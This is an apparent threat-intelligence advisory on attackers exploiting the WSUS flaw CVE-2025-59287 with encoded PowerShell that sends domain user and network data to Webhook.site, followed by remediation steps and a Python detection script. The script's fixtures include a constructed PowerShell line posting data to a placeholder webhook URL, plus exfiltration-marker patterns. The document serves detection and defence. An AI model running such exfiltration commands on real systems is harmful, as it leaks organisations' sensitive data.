Counter Threat Unit™ (CTU) researchers are investigating exploitation of CVE-2025-59287, a remote code execution vulnerability in Microsoft’s Windows Server Update Service (WSUS), a core IT management tool for Windows systems administrators. Microsoft released patches for the affected versions of Windows Server on October 14, 2025. After a detailed technical analysis of CVE-2025-59287 was published and proof-of-concept (PoC) code appeared on GitHub, Microsoft issued an out-of-band security update on October 23.
Observations and analysis
On October 24, Sophos identified instances of exploitation of this critical deserialization bug across various customer environments. The surge of activity, which unfolded over several hours, specifically targeted internet-facing WSUS servers and affected a diverse array of industries. Notably, these incidents did not appear to be the result of targeted attacks. It remains uncertain whether the threat actors utilized the publicly available PoC or crafted their own exploit.
The earliest recorded activity was at 02:53 UTC on October 24, when an unidentified threat actor caused IIS worker processes on vulnerable Windows WSUS servers to execute a Base64-encoded PowerShell script via two nested cmd.exe processes, as illustrated in Figure 1.
The decoded PowerShell command collected and exfiltrated sensitive information to the external Webhook.site service, as shown in Figure 2. The script harvested the external IP address and port of the targeted host, a list of Active Directory domain users, and the configuration of every connected network interface. It attempted to send this data to a hard-coded Webhook.site address via an HTTP POST request using the Invoke-WebRequest cmdlet, falling back to the native curl command if that failed. Across the six incidents documented in Sophos customer telemetry, CTU researchers observed four distinct Webhook.site URLs.
Three of these URLs belonged to Webhook.site’s free service, which is limited to 100 webhook requests. As of this writing, the request history for two of these URLs remains accessible to anyone with the link. The requests show that exploitation of vulnerable servers began on October 24 at 02:53:47 UTC and hit the 100-request limit by 11:32 UTC. The raw content contained sensitive domain user and interface information from multiple universities and from organizations in the technology, manufacturing, and healthcare sectors; many of the affected entities are located in the United States. Censys scan data confirmed that the public interfaces recorded in the webhook content corresponded to Windows servers with the default WSUS ports 8530 and 8531 exposed to the internet.
Recommendations and detections
In light of these findings, CTU researchers advise organizations operating WSUS services to undertake the following actions:
- Review the vendor advisory and apply patches and remediation guidance as appropriate.
- Identify WSUS server interfaces that are exposed to the internet.
- Examine available network, host, and application logs for signs of malicious scanning and exploitation.
- Implement segmentation and filtering to limit access to WSUS ports and services to only those systems that require it.
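As an added example for the log review in the third recommendation (not code from the Sophos advisory), the following Python flags process-creation events that match the chain described above: the IIS worker process (w3wp.exe) spawning cmd.exe, nested cmd.exe, and Base64-encoded PowerShell, whose payload is decoded and checked for the Webhook.site, Invoke-WebRequest and curl exfiltration markers. The sample events, the script body and the webhook ID are constructed placeholders, and the event field names assume a Sysmon-style process-creation record.

```python
import base64
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); the
# webhook ID and script body are placeholders, not indicators from the advisory.
SAMPLE_SCRIPT = "Invoke-WebRequest -Uri https://webhook.site/PLACEHOLDER-ID -Method POST -Body $data"
ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": CMD,
     "cmdline": 'cmd.exe /c "cmd.exe /c powershell.exe -nop -w hidden -enc ' + ENCODED + '"'},
    {"parent": CMD, "image": CMD,
     "cmdline": "cmd.exe /c powershell.exe -nop -w hidden -enc " + ENCODED},
    {"parent": CMD, "image": PS, "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    # Benign: an administrator running a maintenance script from the desktop.
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -File C:\scripts\wsus-cleanup.ps1"},
]

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)  # -e/-ec/-enc/-EncodedCommand + Base64
EXFIL_MARKERS = ("webhook.site", "invoke-webrequest", "curl")  # exfiltration behaviour described in the advisory

def decode_encoded_command(cmdline):
    # PowerShell -EncodedCommand payloads are Base64 over UTF-16LE text.
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:  # binascii.Error subclasses ValueError
        return ""

def classify(event):
    # Returns the reasons an event is suspicious; an empty list means benign.
    reasons = []
    parent, image = event["parent"].lower(), event["image"].lower()
    if parent.endswith("\\w3wp.exe") and image.endswith("\\cmd.exe"):
        reasons.append("iis_worker_spawned_cmd")  # WSUS runs under IIS; a shell child is abnormal
    decoded = decode_encoded_command(event["cmdline"])
    if decoded:
        reasons.append("encoded_powershell")
        hits = [mk for mk in EXFIL_MARKERS if mk in decoded.lower()]
        if hits:
            reasons.append("exfil_markers:" + ",".join(hits))
    return reasons

def scan(events):
    # Indexes of events that triggered at least one reason.
    return [i for i, e in enumerate(events) if classify(e)]
```

Run `scan(SAMPLE_EVENTS)` against real telemetry by mapping your log source's parent image, image and command line fields onto the same keys; the first three constructed events are flagged and the benign one is not.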
Additionally, the following Sophos protections are in place to detect activity associated with this threat:
- SID: 2311778
- SID: 2311779
- SID: 2311809
- SID: 2311810
- SID: 65422